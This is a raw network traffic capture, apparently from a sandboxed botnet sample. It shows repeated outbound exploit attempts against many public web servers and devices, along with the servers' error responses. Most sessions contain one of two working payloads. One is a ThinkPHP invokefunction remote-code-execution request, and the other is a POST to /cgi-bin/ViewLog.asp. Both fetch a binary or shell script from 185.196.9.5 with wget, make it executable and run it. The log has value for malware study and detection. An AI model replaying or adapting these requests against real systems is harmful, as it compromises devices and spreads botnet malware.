Feb 25, 2024 19:02:29.408662081 CET	516	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Sun, 25 Feb 2024 18:02:28 GMT Server: lighttpd/1.4.33 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.15	33936	112.121.164.19	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:29.117950916 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:29.422468901 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:02:29 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.15	49994	112.196.22.241	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:29.250092030 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:29.660710096 CET	125	IN	HTTP/1.0 400 Bad Request Server: CLEARDEAL_L3 Date: mon, 26 feb 2024 00:01:09 GMT Content-Length: 0 Connection: Close

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.15	45786	62.78.76.250	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:29.275625944 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:29.456177950 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:02:29 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.15	38950	31.136.69.69	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:29.276413918 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:32.422696114 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:38.566597939 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:50.600516081 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:16.454068899 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:05.605653048 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.15	57748	94.206.19.170	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:29.288423061 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:29.596266031 CET	375	IN	HTTP/1.1 301 Moved Permanently X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self' X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15552000 location: https://185.196.9.5:8081/cgi-bin/ViewLog.asp Date: Sun, 25 Feb 2024 18:02:29 GMT Connection: keep-alive Keep-Alive: timeout=5 Transfer-Encoding: chunked Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Feb 25, 2024 19:02:29.596637011 CET	59	IN	HTTP/1.1 400 Bad Request Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.15	54858	94.123.17.82	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:29.325926065 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.15	36020	85.112.90.243	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:29.336081028 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:29.587192059 CET	665	IN	HTTP/1.1 404 Not Found Content-Type: text/html X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Strict-Transport-Security: max-age=31536000; includeSubdomains Content-Length: 341 Connection: close Date: Sun, 25 Feb 2024 18:02:28 GMT Server: lighttpd/1.4.69 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <h1>404 Not Found</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.15	41918	112.171.60.150	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:30.089272022 CET	489	IN	Data Raw: 28 6e 75 6c 6c 29 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 20 31 39 64 65 63 32 30 30 33 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 36 20 46 65 62 20 32 30 32 34 20 Data Ascii: (null) 400 Bad RequestServer: mini_httpd/1.19 19dec2003Date: Mon, 26 Feb 2024 03:02:29 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: close<HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BOD

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.15	55316	112.16.247.108	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:31.021269083 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:31.418574095 CET	193	IN	HTTP/1.1 404 Not Found Content-Length: 0 X-NWS-LOG-UUID: 17775140683376170073 Connection: close Server: Lego Server Date: Sun, 25 Feb 2024 18:02:31 GMT X-Cache-Lookup: Return Directly
Feb 25, 2024 19:02:31.626471043 CET	1	IN	Data Raw: 0d Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.15	58600	112.65.171.122	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:31.338613033 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:31.659849882 CET	298	IN	HTTP/1.1 400 Bad Request Connection: close Content-Type: text/html Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 0a 45 72 72 6f 72 20 63 6f 64 65 3a 20 33 35 0a 50 61 72 73 65 72 20 45 72 72 6f 72 3a 20 5b 47 45 54 20 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 5d 0a 3c 50 3e 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1>Your browser sent a request that this server could not understand.Error code: 35Parser Error: [GET /index.php?s=/index/hink]<P></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.15	39712	31.136.119.117	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:31.887514114 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:32.486682892 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:33.670830965 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:36.262768984 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:41.126456976 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:50.600903034 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:10.310312986 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:49.221894979 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.15	60282	88.221.77.43	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:31.914561987 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:32.246710062 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:32.494963884 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:02:32 GMT Date: Sun, 25 Feb 2024 18:02:32 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 